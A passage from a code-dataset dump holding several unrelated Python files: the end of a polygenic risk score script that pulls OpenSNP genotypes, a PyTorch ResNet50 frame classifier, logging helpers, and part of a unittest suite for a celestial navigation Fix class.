---------------------------------------------------------------------------\n## Argument parser\nparser = argparse.ArgumentParser(description='This package calculates the PRS scores for a condition in different individuals under different provided models. It also summarizes the data for analysis.')\nparser.add_argument('user_data', type=str, nargs=1,\n help=\"\"\"File containing a table with two columns. The first column describes presence or absence of the condition in an individual. 
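A minimal illustrative file might look like this (tab-separated; the 'file_link' header is the column name this script reads later, while the condition column name and the ids shown are hypothetical):\n\n                        condition\tfile_link\n                        1\t6597\n                        0\t8842\n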
\n The second one is an OpenSNP file id that references the genotype of an individual for download.\"\"\")\nparser.add_argument('prs_model', type=str, nargs='+',\n help=\"\"\"File containing a table with two columns describing the PRS model coefficients. The first column contains the variants identifiers (rsIDs) considered in the model. \n The second column contains the weights (beta coefficients) of each variant. Multiple models can be specified.\"\"\")\nparser.add_argument('--out', type=str, default='cohort_prs_out.csv',\n help=\"\"\"Name of the output DataFrame. (Default: cohort_prs_out.csv)\"\"\")\n \nargs = parser.parse_args()\n\n# ---------------------------------------------------------------------------\n## Main function\n\ndef main(args):\n \n ## Reading the PRS models data \n t_start = timer()\n\n models = {}\n for model_path in args.prs_model:\n model_name = os.path.splitext(os.path.basename(model_path))[0]\n models[model_name] = pd.read_csv(model_path, sep='\\t')\n\n t_end = timer()\n print(\"[{timestamp}]: Data from the PRS models successfully loaded! ----- Time elapsed (s): {time}\".format(timestamp=datetime.now(), time=(t_end - t_start)))\n\n ## Obtaining the major (non-effect) allele for the variants considered in each model\n t_step = timer()\n\n models_alleles = {k: prs.get_major_alleles_model(v) for k, v in models.items()}\n del models\n\n t_end = timer()\n print(\"[{timestamp}]: Major (non-effect) alleles successfully recovered! ----- Time elapsed (s): {time}\".format(timestamp=datetime.now(), time=(t_end - t_step)))\n\n ## Reading the list of genotyped users and conditions to evaluate\n t_step = timer()\n\n indiv_data = pd.read_csv(args.user_data[0], sep='\\t', comment='#')\n\n t_end = timer()\n print(\"[{timestamp}]: List of individuals' OpenSNP IDs and conditions successfully loaded! ----- Time elapsed (s): {time}\".format(timestamp=datetime.now(), time=(t_end - t_step)))\n\n ## Obtaining the genotypes of all the individuals\n t_step = timer()\n\n def parallel_retrieval_genotypes(user_series):\n user_id = user_series['file_link']\n genotype_individual = prs.get_genotype_individual(user_id)\n return genotype_individual\n \n users_genotypes = indiv_data.apply(lambda x: parallel_retrieval_genotypes(x), axis=1)\n users_genotypes = users_genotypes.set_axis(indiv_data['file_link'])\n\n t_end = timer()\n print(\"[{timestamp}]: Genotype data of individuals successfully retrieved from OpenSNP! ----- Time elapsed (s): {time}\".format(timestamp=datetime.now(), time=(t_end - t_step)))\n\n ## Merge genotypes with the models and store them in a dictionary and calculating the PRS by individual per model\n t_step = timer()\n\n prs_scores_dict = {}\n for name, model in models_alleles.items():\n prs_scores_dict[name] = users_genotypes.apply(lambda x: prs.calculating_prs_individual(prs.merge_allelic_data(x, model)), axis=1)\n t_end = timer()\n print(\"[{timestamp}]: Cohort PRS for {model_name} successfully calculated! ----- Time elapsed (s): {time}\".format(timestamp=datetime.now(), model_name=name, time=(t_end - t_step)))\n\n ## Producing the final dataset with individuals, condition, and PRS scores per model\n t_step = timer()\n\n for model, prs_score in prs_scores_dict.items():\n column = prs_score.to_frame().reset_index()\n column.columns = ['file_link', 'PRS_{model}'.format(model=model)]\n indiv_data = indiv_data.merge(column, on='file_link', how='inner')\n \n t_end = timer()\n print(\"[{timestamp}]: PRSs of the cohort for all models successfully calculated! 
----- Time elapsed (s): {time}\".format(timestamp=datetime.now(), time=(t_end - t_step)))\n\n t_end = timer()\n print(\"[{timestamp}]: Workflow finished, bye! ----- Runtime of the entire workflow (s): {time}\".format(timestamp=datetime.now(), time=(t_end - t_start)))\n return indiv_data\n\n# ---------------------------------------------------------------------------\n## Boilerplate for command line execution of main function for testing\nif __name__ == '__main__':\n t_prs_start = timer()\n print(\"[{timestamp}]: Cohort PRS calculator started!!!\".format(timestamp=datetime.now()))\n \n results = main(args)\n results.to_csv(args.out, index=False)\n \n t_prs_end = timer()\n print(\"[{timestamp}]: Script-mode execution finished, bye! ----- Runtime of the workflow in script mode (s): {time}\".format(timestamp=datetime.now(), time=(t_prs_end - t_prs_start)))","repo_name":"ayala-usma/openPRS","sub_path":"src/cohort_prs.py","file_name":"cohort_prs.py","file_ext":"py","file_size_in_byte":5958,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"2048968019","text":"import torch\nimport torch.nn as nn\nimport os\nimport torchvision.models as models\n\nfrom global_params import pretrainedPath\n\nclass Frame2dResNet50(nn.Module) :\n def __init__(self, use_pretrain=-1, num_classes=200) :\n super().__init__()\n self.frame_model = models.resnet50(num_classes=num_classes) ## back to 50\n if (use_pretrain >= 0) :\n self.loadPretrainedParam(use_pretrain)\n \n def forward(self, x) :\n B, C, T, H, W = x.shape\n if self.training :\n return self.frame_model(x[:,:,T//2,:,:])\n else :\n logits = self.frame_model(x.permute(0, 2, 1, 3, 4).contiguous().view(-1, C, H, W))\n return logits.view(B, T, -1).mean(dim=1)\n \n def loadPretrainedParam(self, n_levels) :\n assert(n_levels <= 4)\n resnet_imgnet_checkpoint = torch.load(os.path.join(pretrainedPath, 'resnet50-19c8e357.pth'))\n states_to_load = {}\n for name, param in resnet_imgnet_checkpoint.items() :\n if name.startswith('fc') :\n continue\n if name.startswith('layer') :\n if int(name[5]) <= n_levels :\n states_to_load[name]=param\n else :\n states_to_load[name]=param\n model_state = self.frame_model.state_dict()\n model_state.update(states_to_load)\n self.frame_model.load_state_dict(model_state)","repo_name":"hyin-stanford/project-moments","sub_path":"2dResNet/Frame2dResNet50.py","file_name":"Frame2dResNet50.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18443689583","text":"import numpy as np\nimport datetime\nfrom utils.file_handling import get_file_name, get_path\n\npath = get_path()\n\n\ndef print_parameters(par: dict) -> None:\n \"\"\"\n Prints user defined parameters. 
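The parameters are written through print_log below, so they go both to stdout and are\n    appended to the run's log file ('<name>_log.txt', where the name comes from get_file_name(par)).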
\n \"\"\"\n print_log(par,\n \"dataset name: \",par[\"dataset_name\"],\", date : \",datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\" \\n\"\n\n \" using appliances: \", par['appliances'],\"\\n\"\n\n \" transtype: \",par[\"trs_type\"],\"\\n\"\n \" gaf trans type: \"f\"{par['trs_type_gaf']}\",\"\\n\"\n\n \" windows size in mins: \"f\"{par['step_in_mins']}\",\"\\n\"\n \" image size in pixels: \"f\"{par['img_size']}\",\"\\n\"\n\n \" sample period: \"f\"{par['resample_period']}\",\"\\n\"\n\n \" number if images that are stacked together and in series(series!): \"f\"{par['frames']}\",\"\\n\"\n \" allowed max delta between images \"f\"{par['allowed_delta_between_frames']}\",\"\\n\"\n\n \" added brightness: \"f\"{par['add_brightness']}\",\"\\n\"\n\n \" save source timeseries: \"f\"{par['ts_save']}\",\"\\n\"\n \n \" manually select appliances: \"f\"{par['manually_select_appliances']}\",\"\\n\"\n\n \" number of appliances: \"f\"{len(par['appliances'])}\",\"\\n\"\n \" number of buildings: \"f\"{par['n_buildings']}\",\"\\n\"\n\n \" max number of images per appliance per building: \"f\"{par['max_images']}\",\"\\n\"\n\n \" include multiple buildings (Y for Yes N for No): \"f\"{par['multiple_buildings']}\",\"\\n\"\n \" building selected: \"f\"{par['selected_building']}\",\"\\n\"\n )\n\n\ndef print_log(par: dict, *args, **kwargs):\n \"\"\"\n Prints log to stdout and file. \n \"\"\"\n print(*args, **kwargs)\n file_name = get_file_name(par)\n\n with open(path+file_name+\"_log.txt\",'a') as file:\n print(*args, **kwargs, file=file)\n\n\ndef print_progress(i: int, signal_stack: np.ndarray, img_stack: np.ndarray, next_percent:int, par: dict) -> int:\n \"\"\"\n Prints current progress of transformation every 10 %.\n \"\"\"\n signal_slices_len = signal_stack.shape[0]\n img_stack_len = img_stack.shape[0]\n \n if round(100*i/(signal_slices_len),2) > next_percent:\n next_percent += 10\n print_log(par,\"processed: \"f\"{round(100*i/(signal_slices_len), 2)} % finished: \"f\"{round(100*((img_stack_len)/par['max_images']), 2)} %\")\n \n return next_percent\n\n \ndef print_end_of_loop(images_stacked: int, appliance: str, par: dict):\n \"\"\"\n Informs user that script has reached the end of the loop.\n \"\"\"\n print_log(par,\"\\n\")\n print_log(par,\"number of images (per appliance) stacked: \"f\"{images_stacked}\")\n \n print_log(par,\"finished \"f\"{appliance}\")\n print_log(par,\"\\n\")\n\n\ndef print_end(all_images_stacked: int, healthy_appliances: int, par: dict):\n \"\"\"\n Informs user that script has come to an end. 
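It logs the total number of images stored and how many appliances were processed\n    successfully.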
\n \"\"\"\n print_log(par,\"num of images stored: \", all_images_stacked)\n print_log(par,\"appliances stored: \", healthy_appliances)\n","repo_name":"jenkoj/ts2img","sub_path":"utils/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"11940469657","text":"import unittest\r\nimport uuid\r\nimport os\r\nimport Navigation.prod.Fix as F\r\nimport Navigation.prod.Sighting as Sighting\r\nimport Navigation.prod.Angle as Angle\r\nimport Navigation.prod.LogFile as LogFile\r\nimport Navigation.prod.SightingsList as SightingsList\r\nimport xml.etree.ElementTree as ET\r\n\r\nclass TestFix(unittest.TestCase):\r\n \r\n def setUp(self):\r\n self.className = \"Fix.\"\r\n self.logStartString = \"Start of log\"\r\n self.logSightingString = \"Start of sighting file\"\r\n \r\n # set default log file name\r\n self.DEFAULT_LOG_FILE = \"log.txt\"\r\n if(os.path.isfile(self.DEFAULT_LOG_FILE)):\r\n os.remove(self.DEFAULT_LOG_FILE)\r\n \r\n # generate random log file name\r\n self.RANDOM_LOG_FILE = \"log\" + str(uuid.uuid4())[-12:] + \".txt\"\r\n \r\n \r\n self.fix = F.Fix()\r\n self.sighting = Sighting.Sighting(\"BodyName\", \"2016-03-15\", \"23:15:01\", \"60d0.0\", 10, 70, 1200, \"Natural\");\r\n \r\n \r\n self.height_1 = 10\r\n self.pressure_1 = 1200\r\n self.temperature_1 = 70\r\n self.altitude_1 = \"60d0.0\"\r\n self.horizon_1 = \"natural\"\r\n self.horizon_2 = \"artificial\"\r\n \r\n\r\n# 100 Constructor\r\n# Analysis\r\n# inputs:\r\n# logFile: string, optional, unvalidated, len >= 1\r\n# outputs:\r\n# returns: instance of Fix\r\n# also: writes \"Start of log\" to log file\r\n#\r\n# Happy tests:\r\n# logFile: \r\n# omitted -> Fix()\r\n# new logfile -> Fix(\"randomName.txt\")\r\n# existing logfile -> Fix(\"myLog.txt\") (assuming myLog.txt exits)\r\n# Sad tests:\r\n# logFile:\r\n# nonstring -> Fix(42)\r\n# length error -> Fix(\"\")\r\n# \r\n def test100_010_ShouldConstructFix(self):\r\n 'Fix.__init__'\r\n self.assertIsInstance(F.Fix(), F.Fix, \r\n \"Major error: Fix not created\")\r\n \r\n def test100_020_ShouldConstructFixWithDefaultFile(self):\r\n theFix = F.Fix()\r\n try:\r\n theLogFile = open(self.DEFAULT_LOG_FILE, 'r')\r\n entry = theLogFile.readline()\r\n del theLogFile\r\n self.assertNotEquals(-1, entry.find(\"Start of log\"), \r\n \"Minor: first line of log is incorrect\")\r\n except IOError:\r\n self.fail()\r\n self.assertIsInstance(theFix, F.Fix, \r\n \"Major: log file failed to create\")\r\n \r\n def test100_025_ShouldConstructWithKeywordParm(self):\r\n try:\r\n theFix = F.Fix(logFile=self.RANDOM_LOG_FILE)\r\n self.assertTrue(True)\r\n except:\r\n self.fail(\"Minor: incorrect keyword specified\")\r\n self.cleanup()\r\n \r\n \r\n def test100_030_ShouldConstructFixWithNamedFile(self):\r\n theFix = F.Fix(self.RANDOM_LOG_FILE)\r\n try:\r\n theLogFile = open(self.RANDOM_LOG_FILE, 'r')\r\n entry = theLogFile.readline()\r\n del theLogFile\r\n self.assertNotEquals(-1, entry.find(self.logStartString), \r\n \"Minor: first line of log is incorrect\")\r\n except IOError:\r\n self.fail()\r\n self.assertIsInstance(theFix, F.Fix, \"major: log file failed to create\")\r\n self.cleanup() \r\n \r\n def test100_040_ShouldConstructFixWithExistingFile(self):\r\n theFix = F.Fix(self.RANDOM_LOG_FILE)\r\n theFix = F.Fix(self.RANDOM_LOG_FILE)\r\n try:\r\n theLogFile = open(self.RANDOM_LOG_FILE, 'r')\r\n numberOfExpectedEntries = 2\r\n for _ in range(numberOfExpectedEntries):\r\n entry = 
theLogFile.readline()\r\n self.assertNotEquals(-1, entry.find(self.logStartString), \r\n \"Minor: first line of log is incorrect\")\r\n theLogFile.close()\r\n except IOError:\r\n self.fail()\r\n self.assertIsInstance(theFix, F.Fix, \r\n \"Major: log file failed to create\")\r\n self.cleanup() \r\n \r\n def test100_910_ShouldRaiseExceptionOnFileNameLength(self):\r\n expectedDiag = self.className + \"__init__:\"\r\n with self.assertRaises(ValueError) as context:\r\n F.Fix(\"\")\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)], \r\n \"Minor: failure to check for log file name length\") \r\n \r\n def test100_920_ShouldRaiseExceptionOnNonStringFile(self):\r\n expectedDiag = self.className + \"__init__:\"\r\n with self.assertRaises(ValueError) as context:\r\n F.Fix(42)\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)], \r\n \"Minor: failure to check for non-string log file name\") \r\n \r\n \r\n# 200 setSightingFile\r\n# Analysis\r\n# inputs:\r\n# sightingFile: string, mandatory, unvalidated, format = f.xml (len(f) >= 1)\r\n# outputs:\r\n# returns: string with file name\r\n# also: writes \"Start of sighting file f.xml\" to log file\r\n#\r\n# Happy tests:\r\n# sightingFile: \r\n# legal file name -> setSightingFile(\"sightingFile.xml\") \r\n# Sad tests:\r\n# sightingFile:\r\n# nonstring -> setSightinghFile(42)\r\n# length error -> setSightingFile(\".xml\")\r\n# nonXML -> setSightingFile(\"sightingFile.txt\")\r\n# missing -> setSightingFile()\r\n# nonexistent file -> setSightingFile(\"missing.xml\")\r\n def test200_010_ShouldConstructWithKeywordParm(self):\r\n 'Minor: '\r\n theFix = F.Fix(logFile=self.RANDOM_LOG_FILE)\r\n try:\r\n result = theFix.setSightingFile(\"CA02_200_ValidStarSightingFile.xml\")\r\n self.assertEquals(result, \"CA02_200_ValidStarSightingFile.xml\")\r\n except:\r\n self.fail(\"Minor: incorrect keyword specified in setSighting parm\")\r\n self.cleanup() \r\n\r\n def test200_020_ShouldSetValidSightingFile(self):\r\n theFix = F.Fix()\r\n result = theFix.setSightingFile(\"CA02_200_ValidStarSightingFile.xml\")\r\n self.assertEquals(result,\"CA02_200_ValidStarSightingFile.xml\")\r\n theLogFile = open(self.DEFAULT_LOG_FILE, \"r\")\r\n logFileContents = theLogFile.readlines()\r\n self.assertNotEquals(-1, logFileContents[-1].find(self.logSightingString), \r\n \"Minor: first setSighting logged entry is incorrect\")\r\n theLogFile.close()\r\n \r\n def test200_910_ShouldRaiseExceptionOnNonStringFileName(self):\r\n expectedDiag = self.className + \"setSightingFile:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(42)\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Minor: failure to check for non-string sighting file name\") \r\n \r\n def test200_920_ShouldRaiseExceptionOnFileLengthError(self):\r\n expectedDiag = self.className + \"setSightingFile:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(\".xml\")\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Minor: failure to check for .GE. 
1 sighting file name\") \r\n \r\n def test200_930_ShouldRaiseExceptionOnNonXmlFile1(self):\r\n expectedDiag = self.className + \"setSightingFile:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(\"sighting.\")\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Minor: failure to check for non.xml sighting file extension\")\r\n \r\n def test200_940_ShouldRaiseExceptionOnNonXmlFile2(self):\r\n expectedDiag = self.className + \"setSightingFile:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(\"xml\")\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Minor: failure to delineate between sighting file name and extension\") \r\n \r\n def test200_950_SholdRaiseExceptionOnMissingFileName(self):\r\n expectedDiag = self.className + \"setSightingFile:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile()\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Major: failure to check for missing sighting file\") \r\n \r\n \r\n def test200_960_SholdRaiseExceptionOnMissingFile(self):\r\n expectedDiag = self.className + \"setSightingFile:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(self.RANDOM_LOG_FILE+\".xml\")\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Major: failure to check for missing sighting file\") \r\n \r\n# 300 getSightings\r\n# Analysis\r\n# inputs:\r\n# via parm: none\r\n# via file: xml description of sighting\r\n# outputs:\r\n# returns: (\"0d0.0\", \"0d0.0\")\r\n# via file: writes body /t date /t time /t adjusted altitude in sorted order\r\n# entry criterion:\r\n# setSightingsFile must be called first\r\n#\r\n# Happy tests:\r\n# sighting file \r\n# valid file with any sightings -> should return (\"0d0.0\", \"0d0.0\")\r\n# valid file with mixed indentation -> should not indicate any errors\r\n# valid file with one sighting -> should log one star body\r\n# valid file with multiple sightings -> should log star bodies in sorted order\r\n# valid file with multiple sightings at same date/time -> should log star bodies in order sorted by body \r\n# valid file with zero sightings -> should not log any star bodies\r\n# valid file with extraneous tag -> should log star(s) without problem\r\n# sighting file contents\r\n# valid body with natural horizon -> should calculate altitude with dip\r\n# valid body with artificial horizon -> should calculate altitude without dip\r\n# valid body with default values -> should calculate altitude with height=0, temperature=72, pressure=1010, horizon-natural\r\n# Sad tests:\r\n# sightingFile:\r\n# sighting file not previously set\r\n# sighting file with invalid mandatory tag (one of each: fix, body, date, time, observation)\r\n# sighting file with invalid tag value (one of each: date, time, observation, height, temperature, pressure, horizon)\r\n\r\n def test300_010_ShouldIgnoreMixedIndentation(self):\r\n testFile = \"CA02_300_GenericValidStarSightingFile.xml\"\r\n expectedResult = (\"0d0.0\", \"0d0.0\")\r\n theFix = F.Fix()\r\n theFix.setSightingFile(testFile)\r\n result = theFix.getSightings()\r\n self.assertTupleEqual(expectedResult, result, \r\n \"Minor: incorrect return value from getSightings\")\r\n\r\n def test300_020_ShouldIgnoreMixedIndentation(self):\r\n testFile = 
\"CA02_300_ValidWithMixedIndentation.xml\"\r\n theFix = F.Fix()\r\n theFix.setSightingFile(testFile)\r\n try:\r\n theFix.getSightings()\r\n self.assertTrue(True)\r\n except:\r\n self.fail(\"Major: getSightings failed on valid file with mixed indentation\") \r\n\r\n def test300_030_ShouldLogOneSighting(self):\r\n testFile = \"CA02_300_ValidOneStarSighting.xml\"\r\n targetStringList = [\"Aldebaran\", \"2016-03-01\", \"23:40:01\"]\r\n theFix = F.Fix(self.RANDOM_LOG_FILE)\r\n theFix.setSightingFile(testFile)\r\n theFix.getSightings()\r\n \r\n theLogFile = open(self.RANDOM_LOG_FILE, \"r\")\r\n logFileContents = theLogFile.readlines()\r\n theLogFile.close()\r\n \r\n sightingCount = 0\r\n for logEntryNumber in range(0, len(logFileContents)):\r\n if(logFileContents[logEntryNumber].find(targetStringList[0]) > -1):\r\n sightingCount += 1\r\n for target in targetStringList:\r\n self.assertNotEquals(-1, logFileContents[logEntryNumber].find(target), \r\n \"Major: Log entry is not correct for getSightings\")\r\n self.assertEquals(1, sightingCount)\r\n self.cleanup() \r\n \r\n def test300_040_ShouldLogMultipleSightingsInTimeOrder(self): \r\n testFile = \"CA02_300_ValidMultipleStarSighting.xml\"\r\n targetStringList = [\r\n [\"Sirius\", \"2016-03-01\", \"00:05:05\"],\r\n [\"Canopus\", \"2016-03-02\", \"23:40:01\"]\r\n ]\r\n theFix = F.Fix(self.RANDOM_LOG_FILE)\r\n theFix.setSightingFile(testFile)\r\n theFix.getSightings()\r\n \r\n theLogFile = open(self.RANDOM_LOG_FILE, \"r\")\r\n logFileContents = theLogFile.readlines()\r\n theLogFile.close()\r\n \r\n # find entry with first star\r\n entryIndex = self.indexInList(targetStringList[0][0], logFileContents)\r\n self.assertLess(-1, entryIndex, \r\n \"failure to find \" + targetStringList[0][0] + \" in log\")\r\n for index in range(entryIndex+1, len(targetStringList)):\r\n entryIndex += 1\r\n if(not(targetStringList[index][0] in logFileContents[entryIndex])):\r\n self.fail(\"failure to find star in log\")\r\n self.cleanup() \r\n\r\n def test300_050_ShouldLogMultipleSightingsWithSameDateTime(self): \r\n testFile = \"CA02_300_ValidMultipleStarSightingSameDateTime.xml\"\r\n targetStringList = [\r\n [\"Acrux\", \"2016-03-01\", \"00:05:05\"],\r\n [\"Sirius\", \"2016-03-01\", \"00:05:05\"],\r\n [\"Canopus\", \"2016-03-02\", \"23:40:01\"]\r\n ]\r\n theFix = F.Fix(self.RANDOM_LOG_FILE)\r\n theFix.setSightingFile(testFile)\r\n theFix.getSightings()\r\n \r\n theLogFile = open(self.RANDOM_LOG_FILE, \"r\")\r\n logFileContents = theLogFile.readlines()\r\n theLogFile.close()\r\n \r\n # find entry with first star\r\n entryIndex = self.indexInList(targetStringList[0][0], logFileContents)\r\n self.assertLess(-1, entryIndex, \r\n \"failure to find \" + targetStringList[0][0] + \" in log\")\r\n for index in range(entryIndex+1, len(targetStringList)):\r\n entryIndex += 1\r\n if(not(targetStringList[index][0] in logFileContents[entryIndex])):\r\n self.fail(\"failure to find star in log\")\r\n self.cleanup() \r\n\r\n def test300_060_ShouldHandleNoSightings(self): \r\n testFile = \"CA02_300_ValidWithNoSightings.xml\"\r\n targetString1 = \"End of sighting file\"\r\n targetString2 = \"Start of sighting file\"\r\n \r\n theFix = F.Fix(self.RANDOM_LOG_FILE)\r\n theFix.setSightingFile(testFile)\r\n theFix.getSightings()\r\n \r\n theLogFile = open(self.RANDOM_LOG_FILE, \"r\")\r\n logFileContents = theLogFile.readlines()\r\n theLogFile.close()\r\n \r\n endOfSightingFileIndex = self.indexInList(targetString1, logFileContents)\r\n self.assertLess(-1,endOfSightingFileIndex,\r\n \"log file does 
not contain 'end of sighting file' entry\")\r\n self.assertLess(1, endOfSightingFileIndex,\r\n \"log file does not contain sufficient entries\")\r\n self.assertTrue((targetString2 in logFileContents[endOfSightingFileIndex - 1]))\r\n self.cleanup() \r\n \r\n def test300_070_ShouldIgnoreExtraneousTags(self): \r\n testFile = \"CA02_300_ValidWithExtraneousTags.xml\"\r\n targetStringList = [\r\n [\"Sirius\", \"2016-03-01\", \"00:05:05\"],\r\n ]\r\n theFix = F.Fix(self.RANDOM_LOG_FILE)\r\n theFix.setSightingFile(testFile)\r\n theFix.getSightings()\r\n \r\n theLogFile = open(self.RANDOM_LOG_FILE, \"r\")\r\n logFileContents = theLogFile.readlines()\r\n theLogFile.close()\r\n \r\n # find entry with first star\r\n entryIndex = self.indexInList(targetStringList[0][0], logFileContents)\r\n self.assertLess(-1, entryIndex, \r\n \"failure to find \" + targetStringList[0][0] + \" in log\")\r\n for index in range(entryIndex+1, len(targetStringList)):\r\n entryIndex += 1\r\n if(not(targetStringList[index][0] in logFileContents[entryIndex])):\r\n self.fail(\"failure to find star in log\")\r\n self.cleanup() \r\n\r\n\r\n def test300_080_ShouldLogStarWithNaturalHorizon(self):\r\n testFile = \"CA02_300_ValidOneStarNaturalHorizon.xml\"\r\n targetStringList = [\"Hadar\", \"2016-03-01\", \"23:40:01\", \"29d55.7\"]\r\n theFix = F.Fix(self.RANDOM_LOG_FILE)\r\n theFix.setSightingFile(testFile)\r\n theFix.getSightings()\r\n \r\n theLogFile = open(self.RANDOM_LOG_FILE, \"r\")\r\n logFileContents = theLogFile.readlines()\r\n theLogFile.close()\r\n \r\n sightingCount = 0\r\n for logEntryNumber in range(0, len(logFileContents)):\r\n if(logFileContents[logEntryNumber].find(targetStringList[0]) > -1):\r\n sightingCount += 1\r\n for target in targetStringList:\r\n self.assertNotEquals(-1, logFileContents[logEntryNumber].find(target), \r\n \"Major: Log entry is not correct for getSightings\")\r\n self.assertEquals(1, sightingCount)\r\n self.cleanup() \r\n\r\n\r\n def test300_080_ShouldLogStarWithArtificialHorizon(self):\r\n testFile = \"CA02_300_ValidOneStarArtificialHorizon.xml\"\r\n targetStringList = [\"Hadar\", \"2016-03-01\", \"23:40:01\", \"29d55.7\"]\r\n theFix = F.Fix(self.RANDOM_LOG_FILE)\r\n theFix.setSightingFile(testFile)\r\n theFix.getSightings()\r\n \r\n theLogFile = open(self.RANDOM_LOG_FILE, \"r\")\r\n logFileContents = theLogFile.readlines()\r\n theLogFile.close()\r\n \r\n sightingCount = 0\r\n for logEntryNumber in range(0, len(logFileContents)):\r\n if(logFileContents[logEntryNumber].find(targetStringList[0]) > -1):\r\n sightingCount += 1\r\n for target in targetStringList:\r\n self.assertNotEquals(-1, logFileContents[logEntryNumber].find(target), \r\n \"Major: Log entry is not correct for getSightings\")\r\n self.assertEquals(1, sightingCount)\r\n self.cleanup() \r\n \r\n \r\n def test300_090_ShouldLogStarWithDefaultSightingValues(self):\r\n testFile = \"CA02_300_ValidOneStarWithDefaultValues.xml\"\r\n targetStringList = [\"Hadar\", \"2016-03-01\", \"23:40:01\", \"29d59.9\"]\r\n theFix = F.Fix(self.RANDOM_LOG_FILE)\r\n theFix.setSightingFile(testFile)\r\n theFix.getSightings()\r\n \r\n theLogFile = open(self.RANDOM_LOG_FILE, \"r\")\r\n logFileContents = theLogFile.readlines()\r\n theLogFile.close()\r\n \r\n sightingCount = 0\r\n for logEntryNumber in range(0, len(logFileContents)):\r\n if(logFileContents[logEntryNumber].find(targetStringList[0]) > -1):\r\n sightingCount += 1\r\n for target in targetStringList:\r\n self.assertNotEquals(-1, logFileContents[logEntryNumber].find(target), \r\n \"Major: Log 
entry is not correct for getSightings\")\r\n self.assertEquals(1, sightingCount)\r\n self.cleanup() \r\n\r\n def test300_910_ShouldRaiseExceptionOnNotSettingSightingsFile(self):\r\n expectedDiag = self.className + \"getSightings:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.getSightings()\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Major: failure to set sighting file before getSightings()\") \r\n \r\n def test300_920_ShouldRaiseExceptionOnMissingMandatoryTag(self):\r\n expectedDiag = self.className + \"getSightings:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(\"CA02_300_InvalidWithMissingMandatoryTags.xml\")\r\n theFix.getSightings()\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Major: failure to check for missing mandatory tag\") \r\n \r\n def test300_930_ShouldRaiseExceptionOnInvalidBody(self):\r\n expectedDiag = self.className + \"getSightings:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(\"CA02_300_InvalidBody.xml\")\r\n theFix.getSightings()\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Major: failure to check for invalid body\") \r\n \r\n def test300_940_ShouldRaiseExceptionOnInvalidDate(self):\r\n expectedDiag = self.className + \"getSightings:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(\"CA02_300_InvalidDate.xml\")\r\n theFix.getSightings()\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Major: failure to check for invalid body\") \r\n \r\n def test300_950_ShouldRaiseExceptionOnInvalidTime(self):\r\n expectedDiag = self.className + \"getSightings:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(\"CA02_300_InvalidTime.xml\")\r\n theFix.getSightings()\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Major: failure to check for invalid body\") \r\n \r\n def test300_960_ShouldRaiseExceptionOnInvalidObservation(self):\r\n expectedDiag = self.className + \"getSightings:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(\"CA02_300_InvalidObservation.xml\")\r\n theFix.getSightings()\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Major: failure to check for invalid body\") \r\n \r\n def test300_970_ShouldRaiseExceptionOnInvalidHeight(self):\r\n expectedDiag = self.className + \"getSightings:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(\"CA02_300_InvalidHeight.xml\")\r\n theFix.getSightings()\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Major: failure to check for invalid body\" )\r\n \r\n def test300_980_ShouldRaiseExceptionOnInvalidTemperature(self):\r\n expectedDiag = self.className + \"getSightings:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(\"CA02_300_InvalidTemperature.xml\")\r\n theFix.getSightings()\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Major: failure to check for invalid body\" )\r\n \r\n def test300_990_ShouldRaiseExceptionOnInvalidPressure(self):\r\n expectedDiag = self.className + \"getSightings:\"\r\n 
